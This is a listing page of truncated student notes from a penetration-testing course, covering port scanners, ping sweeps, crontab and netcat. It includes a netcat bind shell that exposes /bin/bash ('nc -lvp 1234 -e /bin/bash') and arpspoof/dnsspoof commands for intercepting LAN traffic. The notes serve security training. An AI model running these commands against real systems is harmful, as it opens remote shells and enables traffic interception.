Advanced Penetration Testing Notes

pipal

Tool for statistics on cracked passwords. [view]

By: plabig | Related Lesson: Passwords (part 4) Using oclhashcat | Modified: October 13, 2017

ChaptorXI

C program #include <stdio.h> int main(int argc, char ”argv[]) {    if  (argc < 2)    {        printf(’%s\n”, ”Pass your name as an argument”);  return -1;    } else {       printf(”Hello [view]

By: Pawan Kumar Singh | Related Lesson: Programming (part 5) Python Import Command | Modified: October 13, 2017

Chapert X

Python Script #which python > path nano python.py #!/usr/bin/python ( port scanner) import socket ip = raw_input(”Enter the IP address: ”) port = input (”Enter the port number: ”) sock = socket.socket(socket.AF_INET, socke [view]

By: Pawan Kumar Singh | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: October 13, 2017

Chapert IX

Chapter IX #!/bin/bash if [ ”$1” ==””] then echo ~Usage: ./ping.sh [network]~ echo”Example: ./ping.sh 192.168.1” else for x in seq 1 254 ; do ping -c 1 ping $1.$x | grep ”64 bytes” cut -d ” ” [view]

By: Pawan Kumar Singh | Related Lesson: Programming (part 3) Network Pings | Modified: October 13, 2017

Chapert VIII

Bash scripting ping sweep ping www.google.com nano/vi editor nano ping.sh —write script #!/bin/bash echo ~Usage: ./ping.sh [network]~ echo”Example: ./ping.sh 192.168.1” save. #ping.sh  – not work echo $PATH ./ping.sh permissi [view]

By: Pawan Kumar Singh | Related Lesson: Programming (part 2) Bash Scripting and If/Then Command | Modified: October 13, 2017

Chapter VII

Chapter VII- Programming     [view]

By: Pawan Kumar Singh | Related Lesson: Programming (part 1) Fundamentals for Pen Testers | Modified: October 13, 2017

Chapter VI

Cron automatic task command cd /etc ls |grep cron nano crontab service cron restart   [view]

By: Pawan Kumar Singh | Related Lesson: Linux (part 6) Copy Commands and crontab | Modified: October 13, 2017

Chapter V

Chapter V netstat -antp ifconfig nano /etc/network/interface make Ip address static. ping 198.168.1.76 nc nc nc -lvp port no nc -lvp 1234 -e /bin/bash   [view]

By: Pawan Kumar Singh | Related Lesson: Linux (part 5) IP Addressing and netcat | Modified: October 13, 2017

DNS Spoofing

arpspoof -i eth0 -t 192.168.1.1 192.168.1.37 arpspoof -i eth0 -t 192.168.1.37 192.168.1.1 dnsspoof -i eth0 -f hosts.txt [view]

By: johndcx45 | Related Lesson: Traffic Capture (part 4) DNS | Modified: October 13, 2017

arpspoof

arpspoof -i eth0 -t 192.168.1.37 192.168.1.42 arpspoof -i eth0 -t 192.168.1.42 192.168.1.37  Look for TCP RETRANSMITTION [view]

By: johndcx45 | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: October 13, 2017

« First ‹ Previous 1 70 78 79 80 81 82 90 180 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel